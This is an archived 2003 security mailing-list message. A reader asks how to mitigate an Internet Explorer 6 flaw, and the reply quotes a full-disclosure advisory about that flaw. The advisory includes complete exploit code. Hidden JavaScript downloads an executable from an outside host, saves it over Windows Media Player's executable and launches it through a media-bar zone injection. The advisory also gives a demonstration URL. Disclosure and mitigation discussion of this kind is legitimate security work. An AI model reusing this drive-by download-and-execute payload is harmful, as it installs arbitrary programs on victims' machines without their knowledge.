lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <001401c3794c$f8074fd0$550ffea9@rms>
From: rms at computerbytesman.com (Richard M. Smith)
Subject: Internet explorer 6 on windows XP allows exection of arbitrary code

Do you have any suggestions of feature(s) that can be turned off in
Windows or Internet Explorer that will prevent this exploit for working?
I'm mostly interested in some feature that wouldn't typically be used on
a Web page.   It's also not necessary for there to be a UI to turn a
feature on or off.  A hidden registry setting is fine.

Also, Internet Explorer has an option for turning off sounds in Web
pages.  If sounds are turned off in IE, will this exploit still work?

Thanks,
Richard

-----Original Message-----
From: full-disclosure-admin@...ts.netsys.com
[mailto:full-disclosure-admin@...ts.netsys.com] On Behalf Of jelmer
Sent: Thursday, September 11, 2003 6:32 PM
To: bugtraq@...urityfocus.com
Cc: full-disclosure@...ts.netsys.com
Subject: [Full-Disclosure] Internet explorer 6 on windows XP allows
exection of arbitrary code


Internet explorer 6 on windows XP allows exection of arbitrary code

DESCRIPTION :

Yesterday Liu Die Yu released a number series of advisories concerning
internet explorer
by combining on of these issues with an earlier issue I myself reported
a
while back
You can construct a specially crafted webpage that can take any action
on a
users system
including but not limited to, installing trojans, keyloggers, wiping the
users harddrive etc.


TECHNICAL EXPLAINATION :

Internet explorer 6 comes with a media sidebar in wich you can load and
play
mediaclips
without even leaving the browser. when you instruct the mediabar to load
a
file from an
unknown host or the HTTP status returned by an existing host indicates
an
error
this media bar displays an error page inside the media bar namely

res://C:\WINDOWS\System32\browselc.dll/mb404.htm#path

res URL's are treated as being in the "my computer zone" and are loaded
from
the users filesystem
perfect conditions for the issue I describe on

http://www.mail-archive.com/full-disclosure@lists.netsys.com/msg06791.ht
ml

To work. now all that is needed is a way to inject this exploit code
into
this page
This method was graciously provided by Liu Die Yu as you can read on

http://www.securityfocus.com/archive/1/336937/2003-09-08/2003-09-14/0

Combining these issues we get something like :

--snip--

<textarea id="code" style="display:none;">

    var x = new ActiveXObject("Microsoft.XMLHTTP");
    x.Open("GET", "http://ip3e83566f.speed.planet.nl/1.exe",0);
    x.Send();

    var s = new ActiveXObject("ADODB.Stream");
    s.Mode = 3;
    s.Type = 1;
    s.Open();
    s.Write(x.responseBody);

    s.SaveToFile("C:\\Program Files\\Windows Media
Player\\wmplayer.exe",2);
    location.href = "mms://";

</textarea>

<script language="javascript">

    function preparecode(code) {
        result = '';
        lines = code.split(/\r\n/);
        for (i=0;i<lines.length;i++) {

            line = lines[i];
            line = line.replace(/^\s+/,"");
            line = line.replace(/\s+$/,"");
            line = line.replace(/'/g,"\\'");
            line = line.replace(/[\\]/g,"\\\\");
            line = line.replace(/[/]/g,"%2f");

            if (line != '') {
                result += line +'\\r\\n';
            }
        }
        return result;
    }

    function doit() {
        mycode = preparecode(document.all.code.value);
        myURL = "file:javascript:eval('" + mycode + "')";
        window.open(myURL,"_media")
    }


    window.open("error.jsp","_media");

    setTimeout("doit()", 5000);


</script>

--snip--

error.jsp is a jsp page that consists of one line, namely

<% response.setStatus(HttpServletResponse.SC_UNAUTHORIZED); %>


DEMONSTRATION :

A demonstration is provided at :

http://ip3e83566f.speed.planet.nl/hacked-by-chinese/5.htm


WORKAROUND :

Disable active scripting or do "the sensible thing" and pick another
browser
such as the
excellent mozilla firebird.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ